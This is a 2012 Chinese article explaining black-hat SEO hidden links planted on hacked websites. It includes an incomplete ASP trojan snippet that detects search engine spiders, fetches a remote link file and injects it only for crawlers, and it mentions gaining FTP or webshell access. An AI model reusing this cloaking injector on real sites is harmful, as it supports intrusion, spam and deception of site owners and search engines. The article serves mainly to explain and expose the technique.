隱藏在網(wǎng)站中的殺手 淺談黑鏈的手段
來源:SEO優(yōu)化 2012-08-31
黑鏈是SEO手法中相當普遍的一種手段,籠統(tǒng)地說,它就是指一些人用非正常的手段獲取的其它網(wǎng)站的反向鏈接,最常見的黑鏈就是通過各種網(wǎng)站程序漏洞獲取搜索引擎權(quán)重或者PR較高的網(wǎng)站的WEBSHELL,進而在被黑網(wǎng)站上鏈接自己的網(wǎng)站。
黑客們做黑鏈的方式可能多種多樣,但手段其實只有兩種,一種是直接在目標網(wǎng)站上直接加上特定的鏈接代碼,另外一種只針對搜索引擎的訪問來做,讓搜索引擎誤認為目標站上存在著這樣的鏈接。下面對這兩種方法做一個詳細的解釋。
1.直接在目標頁面上加代碼:這應該是最普通的一種手段,也是很容易發(fā)現(xiàn)的手段。以前的黑鏈大部分都是采用這種手段來進行。首先需要入侵目標站的FTP,然后針對網(wǎng)站所用的程序,在模板或者其他的頁面加上“隱形”的鏈接。這種手段隱蔽性比較差,如果目標站的管理員懂得一定的SEO知識的話,很容易就會被發(fā)現(xiàn)。于是,更多的黑客開始使用第二個手段。
2.通過一段判定的代碼,判定來訪者的名稱和IP地址,如果來訪者是蜘蛛,則將另外一段包涵鏈接的代碼加入到目標頁面中。下面以一個ASP的例子進行說明:
黑客侵入到目標站的FTP,在程序里留下2個木馬文件,一個文件名為int.asp,所包含的代碼為:
0 or instr(httpuser,”google”)>0 or instr(httpuser,”sogou”)>0 or instr(httpuser,”soso”)>0
then Set ObjXMLHTTP=Server.createobject(“MSX”+”ML2.s”+”erv”+”erXML”+”HTTP”) ObjXMLHTTP.Open “GET”,”domain/a/193.txt”,False ObjXMLHTTP.send GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject(“Adodb.Stream”) objStream.Type = 1
objStream.Mode =3 objStream.Open objStream.Write
GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = “gb2312″ GetHtml = objStream.ReadText objStream.Close key1=lcase(GetHtml) key1=Replace(key1&””,”-istxt-”,””)
response.Write key1 end if
%>
通過IP和訪問名稱判定來訪者是否為蜘蛛,將另外一個文件名字叫“193.txt”(主要是鏈接的代碼)的文件寫入到目標頁面中。這樣蜘蛛抓取的代碼跟我們看到的代碼是不一樣的。不管是檢查網(wǎng)頁源文件還是用站長工具,都沒辦法發(fā)現(xiàn)黑鏈的存在。只有一種辦法,那就是檢查快照存檔的代碼頁面,才能夠看出問題來。
第二種辦法雖然復雜了點,但是不容易被發(fā)現(xiàn),就算用這種方法讓你的網(wǎng)站被K,你可能一時半刻都無法發(fā)現(xiàn)問題。實在屬于殺手級別的黑鏈手段。
本文來自:,轉(zhuǎn)載請注明出處。
感謝 五金機電網(wǎng) 的投稿
文章編輯: 365webcall網(wǎng)上客服系統(tǒng)(www.365webcall.com)
我的評論
登錄賬號: | 密碼: | 快速注冊 | 找回密碼 |